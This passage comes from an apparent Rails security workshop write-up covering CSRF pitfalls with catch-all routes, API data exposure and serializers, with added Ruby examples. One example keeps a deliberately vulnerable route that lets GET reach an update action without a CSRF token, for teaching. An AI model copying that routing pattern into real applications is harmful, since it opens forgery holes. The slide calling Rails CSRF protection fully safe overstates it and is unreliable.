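  return true if request.get? || request.head?
  submitted = request.params["authenticity_token"] || request.headers["X-CSRF-Token"]
  return false if submitted.nil? || submitted.empty? || session_token.nil?
  secure_compare(submitted, session_token)
end

# Route table. resources ... only: :create gives POST-only comments#create;
# the slide's `match ..., via: :all` is modelled as the :any verb.
ROUTES = [
  ["POST", %r{\A/forum_threads/[^/]+/comments\z},               "comments#create"],
  [:any,   %r{\A/forum_threads/[^/]+/comments/[^/]+/update\z}, "comments#update"],
].freeze

def route_for(verb, path)
  hit = ROUTES.find { |v, re, _| (v == :any || v == verb) && re =~ path }
  hit && hit[2]
end

# Returns the action that would run, :not_found, or :invalid_authenticity_token
# (the point where protect_from_forgery with: :exception raises).
def dispatch(request, session_token)
  action = route_for(request.verb, request.path)
  return :not_found unless action
  return :invalid_authenticity_token unless verified_request?(request, session_token)
  action
end

if $PROGRAM_NAME == __FILE__
  token = "session-token-0123456789abcdef"   # constructed session token
  p dispatch(Request.new("POST", "/forum_threads/1/comments", {}, {}), token)
  p dispatch(Request.new("GET", "/forum_threads/1/comments/2/update", {}, {}), token)
end
```

The second call is the slide 44 pitfall in one line: the GET reaches comments#update with no token at all, because the verb check short-circuits before the token is ever looked at. The same request over POST is rejected, which is why restricting `match` to the verbs the action needs (or using `resources`) is the fix rather than anything in protect_from_forgery.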
  • 47. Is Rails CSRF protection 100% safe?
  • 48. Yes, it is, as long as you stay close to the Rails guides: resourceful routes with only the verbs they need, and no state-changing action reachable over GET.
  • 51. Sensitive data exposure
      1. Credentials leaking to public repositories.
      2. Lack of proper in-app authorization.
      3. Debugging information in production environments.
      4. Access not restricted, wrong access privileges.
      5. Lack of encryption.
      6. API responses containing sensitive data.
  • 52. Protecting against sensitive data exposure
      1. Code reviews.
      2. Careful authorization.
      3. Strict access.
      4. Encryption.
      5. API exposing only necessary information.
  • 56. GENERATED RAILS API

      # app/controllers/forum_threads_controller.rb
      def index
        @threads = ForumThread.order(updated_at: :desc)
        respond_to do |format|
          format.html
          # render json: calls to_json on the relation: every column of every row.
          format.json { render json: @threads }
        end
      end
  • 57. GENERATED RAILS API - OUTPUT

      [
        {
          "id": 2,
          "title": "Curabitur vel vulputate libero.",
          "created_at": "2016-04-18T10:10:40.648Z",
          "updated_at": "2016-04-18T10:10:40.648Z"
        },
        {
          "id": 1,
          "title": "Lorem ipsum dolor sit amet.",
          "created_at": "2016-04-18T10:10:40.607Z",
          "updated_at": "2016-04-18T10:10:40.607Z"
        }
      ]
  • 58. GENERATED RAILS API - SECURING THE OUTPUT

      # app/controllers/forum_threads_controller.rb
      def index
        @threads = ForumThread.order(updated_at: :desc)
        respond_to do |format|
          format.html
          # Serialize only the title. Note that Relation#only filters query
          # clauses such as :where and :order, not columns, so
          # @threads.only(:title) would still return every attribute;
          # to_json(only: ...) is what limits the serialized attributes.
          format.json { render json: @threads.to_json(only: :title) }
        end
      end
  • 59. GENERATED RAILS API - SECURED OUTPUT

      [
        { "title": "Curabitur vel vulputate libero." },
        { "title": "Lorem ipsum dolor sit amet." }
      ]
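Added example for this page, not the workshop's code: plain-Ruby stand-ins for the ForumThread record and the JSON index response of slides 56 to 59, with the default render (every attribute, as ActiveRecord's as_json does) next to an explicit allowlist serializer, plus a check that reports which keys left the API without being on the allowlist. The columns follow the slide's output plus an assumed user_id foreign key, the rows are constructed sample data, and the serializer class is this example's own.

```ruby
require "json"

ForumThread = Struct.new(:id, :title, :user_id, :created_at, :updated_at)

# Constructed sample rows, matching the slide 57 output plus user_id.
THREADS = [
  ForumThread.new(2, "Curabitur vel vulputate libero.", 7, "2016-04-18T10:10:40.648Z", "2016-04-18T10:10:40.648Z"),
  ForumThread.new(1, "Lorem ipsum dolor sit amet.",     3, "2016-04-18T10:10:40.607Z", "2016-04-18T10:10:40.607Z"),
].freeze

# Slide 56: render json: @threads serializes every attribute of every row.
def index_json_default(threads)
  JSON.generate(threads.map(&:to_h))
end

# Slides 58 and 61: a serializer that names exactly what leaves the
# application (the Active Model Serializers idea without the gem). Adding a
# column to the table changes nothing here until someone lists it.
class ForumThreadSerializer
  ATTRIBUTES = %i[title].freeze

  def initialize(record)
    @record = record
  end

  def as_json
    ATTRIBUTES.each_with_object({}) { |name, hash| hash[name] = @record.public_send(name) }
  end
end

def index_json_allowlisted(threads, serializer = ForumThreadSerializer)
  JSON.generate(threads.map { |thread| serializer.new(thread).as_json })
end

# Review check for a captured response body: every key in the JSON array
# that the allowlist never approved, in first-seen order.
def leaked_keys(json, allowed)
  JSON.parse(json).flat_map(&:keys).uniq - allowed.map(&:to_s)
end

if $PROGRAM_NAME == __FILE__
  p leaked_keys(index_json_default(THREADS), ForumThreadSerializer::ATTRIBUTES)
  p leaked_keys(index_json_allowlisted(THREADS), ForumThreadSerializer::ATTRIBUTES)
end
```

`leaked_keys` is the "inspect your outputs" item from slide 63 turned into a check you can run in a request spec against every JSON endpoint: feed it the response body and the serializer's attribute list, and anything it returns is a column that reached a client without a decision being made about it.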
  • 61. Solutions for building pretty, secure APIs

      Active Model Serializers
      ● Object Oriented approach
      ● Ability to define decorating methods
      ● All Ruby!
      ● Flexible
      ● Easy to test
      ● Adapter to follow JSON API v1.0 schema
      ● YARD documented

      Jbuilder
      ● Templates approach
      ● ERB-like - might be easy for newcomers
      ● Flexible
      ● Hard to test
      ● No real "adapter" - if you want JSON API v1.0, you have to do it by yourself
  • 63. Things to remember from this workshop:
      1. Never trust anything that comes from the user: params, cookies, headers, everything. Nothing that comes from the user is safe to use as it is.
      2. Always sanitize your HTML output, especially when you allow links or images that come from the user.
      3. Be careful with match routing. Just don't use it if you don't have to.
      4. Inspect your outputs. Return only the necessary information from your API.
      5. Last but not least: get someone to review your code.
  • 64. Thank you for your attention.
  • 65. Na zjeździe 11 30-527 Krakow, Poland tel: +48 12 391 60 76 Silicon Valley Acceleration Center. 180 Sansome Street San Francisco, CA 94104 tel: 1-415-449-4791 info@railwaymen.org www.railwaymen.org @Railwaymen_org railwaymen.software.development /company/railwaymen